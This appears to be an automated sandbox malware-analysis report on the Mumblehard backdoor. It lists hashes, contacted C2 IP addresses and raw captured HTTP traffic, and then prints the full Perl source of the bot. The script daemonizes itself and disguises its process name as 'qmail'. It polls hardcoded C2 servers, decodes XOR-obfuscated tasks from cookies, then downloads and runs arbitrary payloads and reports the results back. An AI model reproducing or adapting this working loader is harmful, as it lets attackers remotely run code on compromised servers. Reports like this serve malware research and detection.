MD5
0c7e1e0530046a4d976e2f1e94d00eb6
SHA256
a4199f2a1539f0e9b5d18b81873ad65f332046b2a1c4f7e44b039fd93e369c87
SHA1
df702f57838bd85c206480abb67e2831d467bf3c
File Name
File Type
C source, ASCII text
Analysis Date/Time
2016-12-15T14:28:09.478050
CPU Platform
X86
Comments
mumblehard backdoor
Tags

IPs Connected

ProtocolIP Address : Port
TCP5.2.86.225 : 80
TCP5.135.42.98 : 80
TCP5.101.142.81 : 80
TCP5.9.157.230 : 80
TCP50.7.133.245 : 80
TCP31.220.18.115 : 80

DNS Queries

TypeQueryResponse

URLs Accessed

TCP Raw Streams

172.16.1.14:55517 --> 5.9.157.230:80

[172.16.1.14:55517 --> 5.9.157.230:80]

GET / HTTP/1.1
Host: 5.9.157.230
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.8,*/*;q=0.9
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close


[5.9.157.230:80 --> 172.16.1.14:55517]

HTTP/1.1 200 OK
Date: Thu, 15 Dec 2016 14:29:09 GMT
Server: Apache/2.4.10 (Debian)
Last-Modified: Sat, 16 Jul 2016 23:12:45 GMT
ETag: "2b60-537c8df744f72-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3078
Connection: close
Content-Type: text/html

Zs6U$#,{'1LxRuw1H(Y=/QId5Mx&_]rwC&o"QU^OLxKC2U4pR7?`iL6zR-if92Al2|LD/:/2a1b|u1aM7]{4!R8'*FW\)|i.6&AOBmf#1^tKvCBcr=Vc.:yx3t{}sXYw~`_hP2OQ$Tcc~4b3&f*)
G4LvGGqQ|D2S1_	}Jwc#s	

	Z,6Icd2v*V67cBs#k_,kw#*fjL^Y3-wck?{u<K9;+r~w;i,nG/+SSdY>\{fR;9d`EDwpFQPX
@q-cypWld,d{m{d+OS?T^84';5;7!wf{Z~Nb
O=29R5GPIAPaWtt4\PdyQAkyIy]>nAas;Y#A.bC}mv?={~zRBBzMLDc/'fTLezPu,x0hAG]G#_\q$5lZui]
[5.9.157.230:80 --> 172.16.1.14:55517]

OO`YGmXT,}
!R
-CYjjrlDbrPW2c9e:	CjX!k]=B$Wj>}5nH}W66mG,=}
ywK8qSEX+^:=L~MBz9B.\^/UG`psa/F]^	;8LZwbm)>0WgUgfHvD$FlkHFBRisv	]Y16*P	0-h8i~?'(@(JA0h5tzWp@	jZ-1E"
g2j"6ER1h#6uM%y"dDM71*N=x9	S2cs4GCLIUt=x8PbTBr':1<rMQ5"mMv(94@6dR($K"$	6zH2MhX0Gtw{pc[>>.(Aa8[6v^>XvT&9!s%E,=Fn"Ck;:prlCljg"GknE80R
@tb
]2Hy.b%O[\P/%BXRO7c,~C{g}j<4,d[pbz[Lm\!c)JfBim/s]4bp1|jB8TW"$H"6Mga	
XA &4O!z'Z;df{@YoL*sOdGs B|,>nBmE56Kw$j5"cV),7n%xBKi$rj@! W#(.PS=o,*trv
A YTT1Y(fRtF7uAH\'>@FL
DxR+RBpT]mJgw1T*m-*,U4,cGK8%JCP0mE
`+W6YJ^11;
s
-_
[5.9.157.230:80 --> 172.16.1.14:55517]

&uJ6q]WM<BcA?t1
q5"+%X 3nQu V:]?F>p_s6`4Ky6k]]|YFxE@*X<d?XS:,]X,em
O8]
B3D
R-\ff2?b)x/ LqXUW[P	vT`(Lh&A
jIcFPr.4^k_*GP{N8rZ$>cJ#-k>EcG*AvMhb	Sl|s+/e<S.$IHl<Ha,jG:l4ux!{>|&xtaQZ=/UwXereT9re<AKh* bB3	':"N&V~nWSC=i)\)	W[VsWwFg/Lk/2o#~t)iSr\N#Z2/N<Src1c=Wlz&{`pQY={CsVbI;7TZr[@
t	
QX1)gD\@5DZktUIbk	!QS-8<4FMKnZS<(sC\GoSg$imWj7
}GU/+Vt=h,mX^OG`+

172.16.1.14:54185 --> 31.220.18.115:80

[172.16.1.14:54185 --> 31.220.18.115:80]

GET / HTTP/1.1
Host: 31.220.18.115
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.8,*/*;q=0.9
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close


[31.220.18.115:80 --> 172.16.1.14:54185]

HTTP/1.1 200 OK
Date: Thu, 15 Dec 2016 14:28:25 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Tue, 01 Nov 2016 14:21:13 GMT
ETag: "1-5403e096eb454"
Accept-Ranges: bytes
Content-Length: 1
Connection: close
Content-Type: text/html






                    
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
$0 = "qmail";
$| = 1;
my $ewblock = 11;
my $eiprogr = 150;
if ($^O eq "linux")   { $ewblock = 11; $eiprogr = 115; }
if ($^O eq "freebsd") { $ewblock = 35; $eiprogr = 36; }
&main();
sub main {
	exit 0 unless defined(my $pid = fork);
	exit 0 if $pid;
	POSIX::setsid();
	$SIG{$_} = "IGNORE"
	  for (qw (HUP INT ILL FPE QUIT ABRT USR1 SEGV USR2 PIPE ALRM TERM CHLD));
	umask 0;
	chdir "/";
	open(STDIN,  "</dev/null");
	open(STDOUT, ">/dev/null");
	open(STDERR, ">&STDOUT");
	my $url = [
		"31.220.18.115", "5.101.142.81", "5.2.86.225", "5.135.42.98",
		"50.7.133.245",  "5.9.157.230"
	my $tst = [ "a" .. "z", "A" .. "Z" ];
	$tst = join("", @$tst[ map { rand @$tst } (1 .. (6 + int rand 5)) ]);
	my $dir = "/var/tmp";
	if (open(F, ">", "/tmp/$tst")) {
		close F;
		unlink "/tmp/$tst";
		$dir = "/tmp";
	my ($header, $content);
	my ($link, $file, $id, $command, $timeout) =
	  ("en.wikipedia.org", "index.html", 1, 96, 10);
	foreach my $rs (@$url) {
		$header  = "$dir/" . time;
		$content = $header . "1";
		unlink $header  if -f $header;
		unlink $content if -f $content;
		&http($rs, $timeout, $header, $content, 0);
		if (open(F, "<", $header)) {
			flock F, 1;
			my ($test, $task) = (0, "");
			while (<F>) {
				s/^\s*([^\s]?.*)$/$1/;
				s/^(.*[^\s])\s*$/$1/;
				next unless length $_;
				$test++ if $_ eq "HTTP/1.0 200 OK" || $_ eq "Connection: close";
				$task = $1 if /^Set-Cookie: PHPSESSID=([^;]+)/;
			}
			close F;
			($link, $file, $id, $command, $timeout) = &decd($task)
			  if $test == 2 && length $task;
		unlink $header  if -f $header;
		unlink $content if -f $content;
	exit 0 if !defined $command || $command !~ /^16$/;
	$header  = "$dir/" . time;
	$content = "$dir/$file";
	unlink $header  if -f $header;
	unlink $content if -f $content;
	&http($link, $timeout, $header, $content, 1);
	my ($resp, $size) = ("000", 0);
	if (open(F, "<", $header)) {
		flock F, 1;
		while (<F>) {
			s/^\s*([^\s]?.*)$/$1/;
			s/^(.*[^\s])\s*$/$1/;
			next unless length $_;
			$resp = $1 if /^HTTP\S+\s+(\d\d\d)/;
		close F;
	$size = (stat $content)[7] if -f $content;
	$size = 0 if !defined $size || $size !~ /^\d+$/;
	if ($size > 0) {
		chmod 0755, $content;
		system "$content >/dev/null 2>&1";
	unlink $header  if -f $header;
	unlink $content if -f $content;
	foreach my $rs (@$url) {
		$header  = "/dev/null";
		$content = $header;
		&http($rs, 10, $header, $content, 0, "$id.$resp.$size");
	exit 0;
sub xorl {
	my ($line, $code, $xor, $lim) = (shift, "", 1, 16);
	foreach my $chr (split(//, $line)) {
		if ($xor == $lim) { $lim = 0 if $lim == 256; $lim += 16; $xor = 1; }
		$code .= pack("C", unpack("C", $chr) ^ $xor);
		$xor++;
	return $code;
sub decd {
	my $data = pack("H*", shift);
	@_ = unpack("C5", substr($data, 0, 5, ""));
	return (&xorl(substr($data, 0, shift, "")),
		&xorl(substr($data, 0, shift, "")), @_);
sub http {
	my ($url, $timeout, $header, $content, $mode, $gecko) = @_;
	$gecko = "20100101" if !defined $gecko || !length $gecko;
	my ($host, $port, $path) = $url =~ /^([^\/:]+):*(\d*)?(\/?[^\#]*)/;
	return unless $host;
	my $addr;
	if (  $host =~ /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/
		&& $1 < 256
		&& $2 < 256
		&& $3 < 256
		&& $4 < 256)
		$addr = pack("C4", $1, $2, $3, $4);
	else { $addr = gethostbyname $host; }
	return unless $addr;
	$port ||= 80;
	$path ||= "/";
	$addr = sockaddr_in($port, $addr);
	my $readers = IO::Select->new() or return;
	my $writers = IO::Select->new() or return;
	my $buffer  = join("\x0D\x0A",
		"GET $path HTTP/1.1",
		"Host: $host",
"User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/$gecko Firefox/7.0.1",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.8,*/*;q=0.9",
		"Accept-Language: en-us,en;q=0.5",
		"Accept-Encoding: gzip, deflate",
		"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
		"Connection: close",
		"\x0D\x0A");
	if ($mode) {
		$buffer = join("\x0D\x0A",
			"GET $path HTTP/1.0",
			"Host: $host",
			"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
			"Accept: text/html,*/*",
			"Connection: close",
			"\x0D\x0A");
	my $socket = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
	return unless $socket;
	$socket->blocking(0);
	unless ($socket->connect($addr)) {
		if ($! != $eiprogr && $! != $ewblock) {
			close $socket;
			return;
	$writers->add($socket);
	$timeout += time;
	my $step = 0;
	while (1) {
		IO::Select->select(undef, undef, undef, 0.02);
		my $writable = (IO::Select->select(undef, $writers, undef, 0))[1];
		foreach my $handle (@$writable) {
			if ($step == 0) { $step = 1 if $handle->connected; }
			if ($step == 1) {
				my $result = syswrite($handle, $buffer);
				if (defined $result && $result > 0) {
					substr($buffer, 0, $result) = "";
					if (!length $buffer) {
						$readers->add($handle);
						$writers->remove($handle);
						$step = 2;
					}
				}
				elsif ($! == $ewblock) { next; }
				else                     { $timeout = 0; }
			}
		my $readable = (IO::Select->select($readers, undef, undef, 0))[0];
		foreach my $handle (@$readable) {
			next if $step < 2;
			my $result;
			if ($step == 2) {
				$result = sysread($handle, $buffer, 8192, length $buffer);
			}
			else { $result = sysread($handle, $buffer, 8192); }
			if (16384 < length $buffer) { $timeout = 0; }
			elsif (defined $result) {
				if ($result > 0) {
					if ($step == 2) {
						my $offset = index($buffer, "\x0D\x0A\x0D\x0A");
						next if $offset < 0;
						if (open(F, ">>", $header)) {
							flock F, 2;
							binmode F;
							print F substr($buffer, 0, $offset);
							close F;
						}
						substr($buffer, 0, $offset + 4) = "";
						$step = 3;
					}
					if ($step == 3) {
						if (length $buffer) {
							if (open(F, ">>", $content)) {
								flock F, 2;
								binmode F;
								print F $buffer;
								close F;
							}
							$buffer = "";
						}
					}
					next;
				}
				$timeout = 0;
			}
			elsif ($! == $ewblock) { next; }
			else                     { $timeout = 0; }
		if ($timeout < time) {
			foreach my $handle ($writers->handles, $readers->handles) {
				$writers->remove($handle) if $writers->exists($handle);
				$readers->remove($handle) if $readers->exists($handle);
				close $handle;
			}
			return;